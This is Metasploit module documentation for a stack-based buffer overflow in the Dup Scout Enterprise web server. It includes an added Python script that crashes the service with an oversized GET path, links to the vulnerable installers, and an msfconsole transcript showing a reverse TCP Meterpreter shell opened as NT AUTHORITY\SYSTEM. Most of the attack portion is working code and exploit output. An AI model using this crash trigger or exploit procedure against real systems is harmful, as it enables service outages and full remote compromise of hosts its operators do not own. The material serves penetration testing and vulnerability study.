Vulnerable Application
This module exploits a stack-based buffer overflow in the web interface of Dup Scout Enterprise versions <= 10.0.18. The built-in web server does not bounds-check the request path of an HTTP GET request, so an oversized path overwrites the stack and can be leveraged to execute arbitrary code in the context of NT AUTHORITY\SYSTEM (the account the Dup Scout service runs as).
This module supports x86 versions of Dup Scout Enterprise on x86 Windows only. It has been tested successfully on Windows 7 SP1 (x86) and Windows XP SP0 (x86).
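The following is an added crash-trigger check, not the Metasploit module's own code: it sends a GET request whose path is far longer than the web server expects and then tests whether the service still answers. It carries no return address or shellcode, so it confirms only the unchecked path length described above (a denial-of-service condition), not code execution. The host, port 80, the 5000-byte path and the timeouts are assumptions chosen for illustration.

```python
"""Oversized-GET-path check for the Dup Scout Enterprise built-in web server.

Added example (not part of the Metasploit module). Sends a request path of
path_len bytes and reports whether the server survives. Port, path length
and timeouts are assumptions; adjust them for the target.
"""
import socket
import sys


def build_request(host: str, path_len: int = 5000, fill: bytes = b"A") -> bytes:
    """Build a minimal HTTP/1.1 GET whose request path is exactly path_len bytes."""
    if path_len < 1:
        raise ValueError("path_len must be at least 1 (the leading '/')")
    path = b"/" + fill * (path_len - 1)
    return (
        b"GET " + path + b" HTTP/1.1\r\n"
        b"Host: " + host.encode("ascii") + b"\r\n"
        b"Connection: close\r\n"
        b"\r\n"
    )


def is_alive(host: str, port: int, timeout: float = 3.0) -> bool:
    """True if the server accepts a connection and answers a benign GET /."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_request(host, path_len=1))
            return len(s.recv(1024)) > 0
    except OSError:  # refused, reset, or timed out (socket.timeout is an OSError)
        return False


def send_oversized(host: str, port: int, path_len: int, timeout: float = 3.0) -> None:
    """Deliver the oversized request; a crashed server resets or never answers."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(host, path_len))
        try:
            s.recv(1024)
        except OSError:
            pass


def crash_check(host: str, port: int = 80, path_len: int = 5000) -> str:
    """Return 'down_before', 'crashed' or 'survived' for the target web server."""
    if not is_alive(host, port):
        return "down_before"
    send_oversized(host, port, path_len)
    return "crashed" if not is_alive(host, port) else "survived"


if __name__ == "__main__":
    # Usage: python dupscout_path_check.py <host> [port] [path_len]
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    length = int(sys.argv[3]) if len(sys.argv) > 3 else 5000
    print(f"{target}:{port} path_len={length} -> {crash_check(target, port, length)}")
```

Run this only against a lab instance you own: a result of "crashed" means the service must be restarted before the Metasploit module is run, and a "survived" result against a patched or x64 build is the expected outcome rather than a false negative of the check.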
Verification Steps
Download:
- https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe
- https://www.exploit-db.com/apps/d83948ebf4c325eb8d56db6d8649d490-dupscoutent_setup_v9.9.14.exe
- https://www.exploit-db.com/apps/4ead3eadc19bf3511e8dfd606624e310-dupscoutent_setup_v9.1.14.exe
- https://www.exploit-db.com/apps/3ca0c9aee534994bc6894bfb309e5a4f-dupscoutent_setup_v9.0.28.exe
- https://web.archive.org/web/20170302/http://www.dupscout.com/setups/dupscoutent_setup_v9.0.28.exe
- https://web.archive.org/web/20160408/http://www.dupscout.com/setups/dupscoutent_setup_v8.3.16.exe
- https://web.archive.org/web/20160826/http://www.dupscout.com/setups/dupscoutent_setup_v8.4.16.exe
Install the application from one of the links above and enable the web server by going to Tools -> Advanced Options -> Server -> Enable Web Server on Port.
Metasploit:
- Start msfconsole
- Do:
use exploit/windows/http/dupscts_bof
- Do:
set rhosts <rhosts>
- Do:
run
- You should get a shell.
Options
Scenarios
Dup Scout Enterprise v9.9.14 on Windows 7 SP1 (x86)
msf6 > use exploit/windows/http/dupscts_bof
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/dupscts_bof) > set rhosts 172.16.191.213
rhosts => 172.16.191.213
msf6 exploit(windows/http/dupscts_bof) > check
[*] 172.16.191.213:80 - The target appears to be vulnerable. Dup Scout Enterprise version 9.9.14.
msf6 exploit(windows/http/dupscts_bof) > set lhost 172.16.191.192
lhost => 172.16.191.192
msf6 exploit(windows/http/dupscts_bof) > run
[*] Started reverse TCP handler on 172.16.191.192:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Dup Scout Enterprise version 9.9.14.
[*] Selecting a target...
[*] Using target: Dup Scout Enterprise v9.9.14 (x86)
[*] Sending payload (8577 bytes) ...
[*] Sending stage (175174 bytes) to 172.16.191.213
[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.213:49380) at 2021-02-25 11:29:52 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-7-ULTIMATE-
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >